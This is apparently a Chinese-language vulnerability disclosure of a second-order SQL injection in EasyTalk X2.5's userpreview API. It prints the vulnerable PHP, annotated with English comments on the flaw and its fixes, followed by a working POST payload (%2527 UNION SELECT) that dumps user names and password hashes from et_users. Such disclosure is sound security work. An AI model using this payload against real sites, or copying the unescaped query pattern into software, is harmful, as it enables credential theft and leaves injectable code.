### 简要描述: EasyTalk_X2.5 最新版SQL注入一枚。 ### 详细说明: 漏洞位于/Home/Lib/Action/ApiAction.class.php的
```
/**
 * Render the HTML "user preview" card for the user named in POST 'username'.
 *
 * Output is written directly with echo; there is no return value. When the
 * username is empty or no matching row is found, a generic loading-error
 * box is echoed instead.
 */
public function userpreview() {
    // The POST value is decoded a second time with rawurldecode(), so a
    // percent-encoded quote (e.g. %27 after the first decode) becomes a
    // literal quote AFTER whatever filtering _post() applied (not shown
    // here). This is the injection point described in the advisory.
    $username=trim(rawurldecode($this->_post('username')));
    if ($username) {
        parent::init();
        // SQL sink: $username is interpolated unescaped into the WHERE
        // string. Mitigation: pass the value through the ORM's array/bound
        // where() form (or escape it) instead of building the string.
        $user = M('Users')->where("user_name='$username'")->find();
        if ($user) {
            if ($user['cityid']) {// user's location
                $dtModel=M('District');
                // Values read back from the DB are again interpolated into
                // WHERE strings; safe only if cityid/upid are guaranteed
                // numeric — TODO confirm the column types.
                $pdata = $dtModel->where("id='$user[cityid]'")->find();
                $pdata2 = $dtModel->where("id='$pdata[upid]'")->find();
                $user['live_city']=$pdata2['name'].' '.$pdata['name'];
            }
            // Follow relation between the viewed user and the current user.
            $isfriend=D('Friend')->followstatus($user['user_id'],$this->my['user_id']);
            // Nickname and user_id are placed inside onclick JS strings
            // without escaping; if nickname is user-editable this is also an
            // HTML/JS injection risk — escape per context.
            $f="<span id='followsp2_".$user['user_id']."'>";
            if($isfriend[$user['user_id']]==1){
                $f.="<span class='followbtn'><img src='".__PUBLIC__."/images/common/fico2.gif'> ".L('already_follow')." | <a onclick=\"followop('delfollow/user_id/{$user[user_id]}','jc','{$user[nickname]}','{$user[user_id]}','".$isfriend[$user['user_id']]."',$(this))\">".L('cancel')."</a></span>";
            // NOTE: bare $user[user_id] (unquoted key outside a string) relies
            // on the undefined-constant-to-string fallback removed in PHP 8.
            }else if ($isfriend[$user[user_id]]==3){
                $f.="<span class='followbtn'><img src='".__PUBLIC__."/images/common/fico.gif'> ".L('follow_followed')." | <a onclick=\"followop('delfollow/user_id/{$user[user_id]}','jc','{$user[nickname]}','{$user[user_id]}','".$isfriend[$user['user_id']]."',$(this))\">".L('cancel')."</a></span>";
            }else{
                $f.="<a class='bh' onclick=\"followop('addfollow/user_id/{$user[user_id]}','gz','{$user[nickname]}','{$user[user_id]}','".$isfriend[$user['user_id']]."',$(this))\">".L('have_a_follow')."</a>";
            }
            $f.="</span>";
            // No message/follow controls when viewing one's own card.
            if ($user['user_id']==$this->my['user_id']) {
                $body2='';
            } else {
                $body2='<div class="fleft"><input type="button" value="'.L('send_message').'" onclick="sendprimsgbox(\''.$user['nickname'].'\')" class="button5"> <input type="button" value="@TA" onclick="talkBox(\'@'.$user['nickname'].' 
\')" class="button5"></div><div class="fright">'.$f.'</div>';
            }
            // Online indicator: last login within the past 600 seconds.
            if(time()-$user['last_login']<=600){
                if($user['isadmin']>0){
                    $zxico='<span class="adminico"> '.L('admin_online').'</span>';
                } else {
                    $zxico='<span class="uonlineico"> '.L('user_online').'</span>';
                }
            } else {
                $zxico='<span class="uofflineico"> '.L('user_offline').'</span>';
            }
            // Profile fields (user_name, nickname, counters) are echoed into
            // HTML and href attributes without htmlspecialchars().
            echo '<div class="body1"> <div class="limg"><a href="'.SITE_URL.'/?'.$user['user_name'].'" target="_blank"><img src="'.sethead($user['user_head']).'" width="50px" height="50px"></a></div> <div class="linfo"> <p> <div class="fleft"> <span class="'.setvip($user['user_auth']).'" '.viptitle($user['user_auth']).'><a href="'.SITE_URL.'/?'.$user['user_name'].'" target="_blank">'.$user['nickname'].'</a></span> </div> <div class="fright" style="width:90px;font-size:12px">'.$zxico.'</div> <div class="clearline"></div> </p> <p>'.($user['user_gender']==1?L('male'):L('female')).' '.$user['live_city'].'</p> <p>'.L('follow').'<a href="'.SITE_URL.'/?'.$user['user_name'].'&act=following" target="_blank">'.$user['follow_num'].'</a> '.L('follower').'<a href="'.SITE_URL.'/?'.$user['user_name'].'&act=follower" target="_blank">'.$user['followme_num'].'</a> '.L('talk').'<a href="'.SITE_URL.'/?'.$user['user_name'].'" target="_blank">'.$user['msg_num'].'</a></p> </div> <div class="clearline"></div> <div class="linfo2">';
            // Verified accounts show auth_info; others show user_info or a
            // placeholder, both truncated to 35 characters.
            if ($user['user_auth']) {
                echo getsubstr($user['auth_info'],0,35);
            } else {
                echo L('user_info').':'.getsubstr($user['user_info']?$user['user_info']:L('nothing_write'),0,35);
            }
            echo '</div> </div> <div class="body2">'.$body2.'</div>';
        } else {
            echo '<div style="height:160px"><br/><br/><br/><center>'.L('loading_error').'</center></div>';
        }
    } else {
        echo '<div style="height:160px"><br/><br/><br/><center>'.L('loading_error').'</center></div>';
    }
}
```
其中这句代码 $username=trim(rawurldecode($this->_post('username'))); 使用了rawurldecode导致二次注入 ### 漏洞证明: [<img src="https://images.seebug.org/upload/201402/201606133d574497983a9c551612990c2cde3d09.jpg" 
alt="sql3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201402/201606133d574497983a9c551612990c2cde3d09.jpg) url为: http://192.168.116.129/easytalk/?m=api&a=userpreview POST数据为: username=my5t3ry%2527/**/union select 1,2,concat(user_name,0x7c,password),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1/**/from/**/et_users%23 最终带入数据库查询语句为: ``` SELECT * FROM `et_users` WHERE user_name='my5t3ry'/**/union select 1,2,concat(user_name,0x7c,password),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1/**/from/**/et_users#' LIMIT 1 ```